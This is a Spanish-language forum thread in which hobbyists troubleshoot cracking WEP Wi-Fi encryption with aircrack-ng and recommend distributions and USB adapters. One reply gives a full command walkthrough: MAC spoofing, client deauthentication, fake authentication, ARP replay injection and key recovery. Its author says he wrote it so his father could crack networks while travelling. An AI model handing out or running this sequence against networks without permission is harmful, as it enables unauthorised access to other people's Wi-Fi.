varias dudas crack WEP y tarjeta para auditoría

Hola a todos!.

Es mi primer post y soy nuevo en esto así que no seáis muy crueles .

1. Crack Wep

Estoy experimentando con el arte del crackeo WEP siguiendo un buen manual disponible en la Web e aircrack: http://www.aircrack-ng.org/doku.php?id=simple_wep_crack

El ataque es sencillo hasta para mí, asociarse con el AP, inyectar con aireplay solicitudes ARP y generar datos a lo bestia para romperlos con aircrack.

El caso es que los tests de inyección de la tarjeta (cuando la pongo en modo monitor) funcionan bien, pero aun asociándome al AP, no inyecta en el mismo paquetes nunca, nunca, nunca...:

Saving ARP requests in replay_arp-0729-192122.cap
You should also start airodump-ng to capture replies.
^Cad 2037 packets (got 0 ARP requests and 7 ACKs), sent 0 packets...(0 pps)

Y el caso es que el chip que lleva esta tarjeta (Ralink, es un RT2571WF que es lo mismo que un RT73) está perfectamente soportado por aircrack.

Sospecho que el NetworkManager de Ubuntu puede estar interfiriendo por algunso posts que he leído por ahí, pero no lo tengo claro.

Lo que me lleva a 2:

2. Distribución a Usar

¿Alguna distribución de Linux recomendada para estos menesteres?. Yo uso Ubuntu por mera comodidad

3. Tarjeta a comprar.

La verdad es que la tarjeta que uso es de calidad poco fiabley estoy buscando una mejor y bien soportada. Tiene que ser USB.

He visto algunas en http://www.comprawifi.com/ que tienen buena pinta, pero estaré encantado de recibir opiniones.

Un saludo y gracias de antemano.

Buenas,

Suponiendo que estas digamos en la subred 192.168.1.0/24 , puedes forzar al AP a generar un paquete ARP haciendo ping a una IP inexistente en la subred. Esto provocara un broadcast ARP lanzado por el AP.

Suerte,

Hola vlan7,

Gracias, aunque esa prueba ya la había hecho porque lo indican en el wiki de aircrack. Soy de esos que se leen la documentación!

Un saludo.

Yo las crakeo siempre con ubuntu y no tengo problemas, me compre una tarjeta usb pedorra de 20 euros (hace 2 años) es una conceptronic c54ru no es muy potente pero trabaja bien...
hace tiempo mi padre me pidio que el tambien queria crackear weps cuando estaba de viaje le hice un "Tutorial" para hacerlo con la distro backtrack4

  Código:

Con backtrack 4:

arrancamos la distro desde CD (depende el pc..)

User: root
password:toor

// subir interface
abrimos consola
#ifconfig wlanX up (X = normalmente 1)
//bajamos interface para cambiar la direccion mac
#macchanger -r wlan1 (cambia nuestra direccion mac)
// subimos interface
#ifconfig wlan1 up

//--Todo listo empezamos
/----------------------------------------------
desde nuestro linux con aircrack instlado (esta en los repositos ubuntu)

airmon-ng start (interface mia)
airodump-ng mon0 (snifa conxiones)
airodump-ng -c (canal) --bssid (MAC del router) -w nombre mon0


otra terminal


aireplay-ng -0 10 -a (mac router) -c (Mac estacion) mon0 (opcional esto lo que hace es desincronizar la estacion con el router para que al reconectarse tire mas paquetes con contraseña wep)
aireplay-ng -1 0 -o 1 -a (mac router) -h (Mac estacion ) mon0
(mac mia en lugar estacion)
----------------------------------------------------
aireplay-ng -1 0 -o 1 -e ( essid) -b (mac router) -h (Mac estacion )
mon0

aireplay-ng -3 -b (Mac router) -h (mac estacion / mia) mon0

---------------
otra terminal directorio terminal 1

aircrack-ng -b (mac router) nombre-01.cap

No pongo explicacion tecnica no tengo tiempo pero si lo sigues te saldra.... le ha salido a mi padre conque....

Hola Cirus,

Gracias, pero ayer antes de leer tu post ya alcancé el hito: mi primera WEP crackeada. Desconozco porqué pero en algunos casos inyecta y en otros no. Creo que tiene que ver con la autenticación, a veces tengo que lanzarla varias veces hasta que el AP objetivo se dé por aludido.

También puede que tenga que ver con la señal...

De todas formas no hay mejor forma de comprobarlo que con un router con WEP propio. Esta semana me hago con uno en el trabajo y me dedicaré a bombardearlo de todas las maneras posibles. Así seguro que no hay problemas de cobertura...cuando tenga unas pocas tablas más compraré una tarjeta con mayor alcance. O me haré un cañón con una lata de pringles XD.

Un saludo y gracias a todos.

Buenas!!

Yo para esos menesteres utilizo Wifislax o en su defecto Backtrack. Casi siempre opto por la primera por el idioma (Wifis está en español no? )

Enhorabuena con el crackeo! Te servirá para no utilizar NUNCA WEP.. a no ser que quieras cazar "piratillas" :P

Saludos